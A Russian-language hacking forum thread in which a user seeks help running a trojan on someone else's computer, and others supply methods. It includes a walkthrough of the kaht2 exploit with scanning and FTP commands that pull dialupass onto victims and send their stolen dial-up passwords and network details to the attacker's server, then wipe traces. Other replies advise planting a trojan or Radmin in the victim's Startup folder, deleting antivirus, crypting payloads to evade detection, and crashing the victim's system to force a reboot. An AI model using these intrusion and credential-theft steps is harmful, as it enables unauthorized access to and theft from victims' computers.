как запустить файл на удаленном компьютере
 

Доброво времени суток :)
Я незнал куда запостить но так как это связано с трояном то подумал что сюда.
А суть такова-Нада запустить файл троя на удаленном компе, а то сам юзверь не хочет, подскажите прогу или метод пажалста.
зы в поиске ничо не нашел похожево а расшаренных ресурсов много :)

start filename.exe

через cmd.exe? можно поподробнее чуток...

ну кому плюсик поставить то?

Ну мне поможет кто? где кулхацкеры? :)

Вот держи.К примеру используй сплоит kaht2
Скачиваем вышеуказанные файлы. Создаем папки 'D:\scan\kaht2', 'D:\scan\kaht2\ftp', 'D:\scan\kaht2\ftp\upload', 'D:\scan\kaht2\ftp\download'.
Распаковываем kaht2.zip в папку D:\scan\kaht2, ftp.zip - D:\scan\kaht2\ftp, dialupass.zip - в D:\scan\kaht2\ftp\download.

Запускаем наш FTP сервер и заходим в раздел User Accounts.
Если уже есть какие-то созданные пользователи, то удаляем их. Жмем на кнопку ADD, вводим имя юзера 'upload' и жмем ОК. Выбираем путь до папки D:\scan\kaht2\ftp\upload и жмем OK. В поле Password вводим upload, ставим галочки как на рисунке и жмем Update.

Снова жмем на кнопку ADD, вводим имя юзера 'download' и жмем ОК. Выбираем путь до папки D:\scan\kaht2\ftp\download и жмем OK. В поле Password вводим download, ставим галочки как на рисунке и жмем Update.

Всё, ftp настроен, переходим к самому главному.
Запускаем ftp-сервер, нажав на зеленую кнопку в вверху и переходим в раздел Server Log.
Жмем на выполнить в меню пуск

Вводим cmd и жмем OK

В окне вводим D:, жмем Enter, вводим cd scan\kaht2 и снова жмем энтер.

Теперь запускаем сам кахт. вводим kaht2.exe 57.66.134.0 57.66.134.255 20 и жмем Enter. Начинается процесс сканирования.
Если у вас не появилось ни одной подобной строчки

значит, беда с файрволом или там провайдером. Отключаем файрвол или меняем своего прова. Идеальными провайдерами для использования кахта однозначно являются Equant, GIN и AT&T.
Если же всё сканится, то ждем появления пободной строчки

Набираем cd.., жмем Enter, cd temp и снова жмем Enter.

Набираем следующую команду (вместо 57.66.158.238 вписываем СВОЙ ip):
echo open 57.66.158.238>download&&echo download>>download&&echo download>>download&&echo get dialupass.exe>>download&&echo bye>>download
И жмем Enter, далее набираем ftp -s:download, жмем ENTER,
Потом того как она выполнится и появится мигающий курсор по порядку выполняем ещё три команды, после набора каждой нажимаем Enter:
dialupass.exe /allusers /stext dialupass.txt
ipconfig /all>ip.txt
set a=%random%
В окне должно получиться нечто следующего типа:

Вводим dir dialupass.txt и жмем ENTER, до тех пор пока не появится следующая строчка:

Как тока она появилась вводим следующую команду и жмем ENTER:
echo open 57.66.158.238>upload&&echo upload>>upload&&echo upload>>upload&&echo mkdir %a%>>upload&&echo cd %a%>>upload&&echo send dialupass.txt>>upload&&echo send ip.txt>>upload&&echo bye>>upload
А потом вводим ftp -s:upload и опять жмем ENTER:
В окне должно отобразиться нечто похожее на это:

Подчищаем за собой следы.
del * /F/Q
И идем в поисках новой жертвы
exit

Тут можна вообще целую статтю написать (для новиччьков). Но потому как таковых мало то идём на http://www.sysinternals.com/

Для D1s0rd3r . Иди сюда.
http://www.sysinternals.com/Utilities/PsExec.html
Скачай это : http://download.sysinternals.com/Files/PsExec.zip
Запускай вот так :
psexec [\\computer[,computer[,..] | @file ][-u user [-p psswd]][-n s][-l][-s|-e][-i][-x][-c [-f|-v]][-d][-w directory][-<priority>][-a n,n,...] cmd [arguments]
И радуйся.
Работать будет если ты админ. Ну это и так понятно должно быть.

Для всех интузиастов берём все итилики от сисинтерналс : http://download.sysinternals.com/Files/PsTools.zip
Если что не понятно по тулзах, то спрашивайте. Гы... Хотя там всё должно быть понятно...

З.Ы. Я когдато писал GUI для PSTools. Если кому интересно то и исходники могу дать. Но маненько не доделал :-(

cardons
это все конешно хорошо но нет ссылок на скачку.
Brun
как я понял файл (http://download.sysinternals.com/Files/PsExec.zip)
запустить на нужном мне компе?а куда эти параметры вписать?

http://sokolkil.narod.ru/xxx/dialupass2.zip - dialupass
http://www.web-hack.ru/download/download.php?go=81 - В этом архиве есть kaht2

Запускаеш на своём а в параметрах пишеш на каком компе что запустить.

Brun
прога запускается и закрывается

cardons
твоя статья дает удаленное администрирование?

Ну вообще, это его статья =))
Дает, только уже почти нигде не работает, разве что у соседки Аньки, у которой ПК появился вчера...

Хреново тогда...какже мне лошадку то запустить?к файлу клеить неохота

А ты имеешь удалёный доступ к сисетме? Можешь удалять файлы запускать?

да у меня есть доступ к расшаренному компу

Это не моя статья
Она дает удаленное администратирование через командную строку а дальше хоть через неё радмин запускай и юзай

Ну я думаю если у людей расшарен комп то они и являються такими соседками Анечками.

Если у тебя комп полностью рашарен так запихай свой трой в папку авто загрузки, когда комп перезагрузят твой трой в ступит в силу.

отличная идея, но он не весь расшарен а только жесский :) мои документы увы нет...

Если есть доступ к папки Documents and Settings то все получиться.

Kaht 2(Сам сплоит) - http://www.securitylab.ru/_exploits/kaht2.zip

Че этот кант2 антивирус на него ругается да и заплатки уже стоят визде.

да нифига ты им походу не сделаешь...

Что именно нужно запустить?

А если это троян нелегче ли его просто на автозагрузку поставить?

да это троян токо как в автозагрузку добрацо?расшарен токо жосский

Говоришь жеский а какой имено с,e или ме если где стоит WINDA то и дешь по токому пути C:\Documents and Settings\user\Главное меню\Программы\Автозагрузк а

спс..а оттуда антивиря можно удалить?

Папку Program files на диске найди и от туда удали. Правда может не удалится если он запушен в смысле антивирь.Но всеж стоит попробывать.

гы можно удалить то что удаляется и работать не будет :)

попробуй залить радмина в папку автозагрузки...
\\имя кампьютера жертвы\C\Documents and Settings\Логин юзера\Главное меню\Программы\Автозагрузк а\

после перезагрузки кампа, радмин загрузится и ты получишь удаленный доступ, если же не спалится антивирем. Если будет палится то попробуй закриптовать его...
А и еще: чтобы не ждать пока перезагрузится, повесь ей винду (dos-атака или еще каким нибудь своеобразным методом ).

а где достать радмина?

D1s0rd3r слушай если это троян то в буилдере, когда компилируеш если функция автозагрузка трояна в компе.

ну да есть, токо для етого ево нада запустить на компе, чего я и добиваюсь!

D1s0rd3r мона скачать здесь-
http://www.radmin.com/download/files/rserv30b2.exe

ploxo vse
 

kulhakerov mnogo a vot tolkovo podskazat nikto ne hochet (((( .... ...
............
[zabanili]
............
:(